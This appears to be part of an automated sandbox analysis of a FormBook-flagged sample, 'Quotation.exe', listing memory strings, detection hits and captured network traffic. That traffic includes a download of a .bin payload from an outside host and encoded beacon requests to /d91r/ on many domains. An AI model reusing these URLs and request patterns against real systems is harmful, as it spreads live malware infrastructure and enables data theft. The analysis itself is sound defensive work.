        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comI
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr, System.dll0.1.drString found in binary or memory: https://github.com/dotnet/runtime
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA38A54.img
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21113239.js
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26404796231.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D3B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0g
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.drString found in binary or memory: https://mozilla.org0
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013FEC000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000564C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MU
        Source: control.exe, 0000000D.00000002.26417532491.0000000007600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/cc6424a
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22674613619.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22642464266.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/other/7-common-travel-mistakes-every-rv-owner-has-made/ss-AAOGa8l
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_domains_btn&
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/action_constructor.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=sh
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/hosting?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_hosti
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/scripts/shop_window.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=s
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl&wn_ca
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_c
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banne
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/wn/img/email/logo-bottom.png
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/wn/img/logo-horizontal.svg
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_logo&wn_campa
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/N
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757935753.0000000003207000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin0
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binR
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binZ
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknownHTTP traffic detected: POST /d91r/ HTTP/1.1Host: www.cardinialethanol.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.cardinialethanol.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cardinialethanol.com/d91r/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 34 3d 38 48 4c 51 72 42 73 6a 77 64 65 56 55 5f 33 79 73 58 4f 4f 45 48 79 6b 4c 70 76 52 41 71 75 70 6b 59 33 32 72 75 4e 52 6a 51 42 61 74 61 50 34 46 66 4a 5f 37 36 4a 6c 4f 46 62 59 34 51 6b 36 56 33 68 46 64 54 61 6a 74 4e 38 30 49 78 51 45 59 58 45 6c 54 37 30 76 5a 6f 65 4f 64 51 54 6f 54 6d 6c 58 72 36 53 75 34 69 6e 5a 6c 4b 77 6d 52 35 7a 52 4a 4f 68 79 76 67 6a 79 64 6f 6a 75 78 4b 56 6d 55 5a 57 69 59 70 38 72 4b 49 57 43 51 48 74 64 61 74 50 4d 62 73 28 32 39 72 56 32 44 59 47 69 75 39 51 58 6e 37 50 42 30 77 50 61 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z4=8HLQrBsjwdeVU_3ysXOOEHykLpvRAqupkY32ruNRjQBataP4FfJ_76JlOFbY4Qk6V3hFdTajtN80IxQEYXElT70vZoeOdQToTmlXr6Su4inZlKwmR5zRJOhyvgjydojuxKVmUZWiYp8rKIWCQHtdatPMbs(29rV2DYGiu9QXn7PB0wPaWg).
        Source: unknownDNS traffic detected: queries for: www.wittofitentertainment.com
        Source: global trafficHTTP traffic detected: GET /kGQffjENy187.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wittofitentertainment.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Found potential ransomware demand text
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
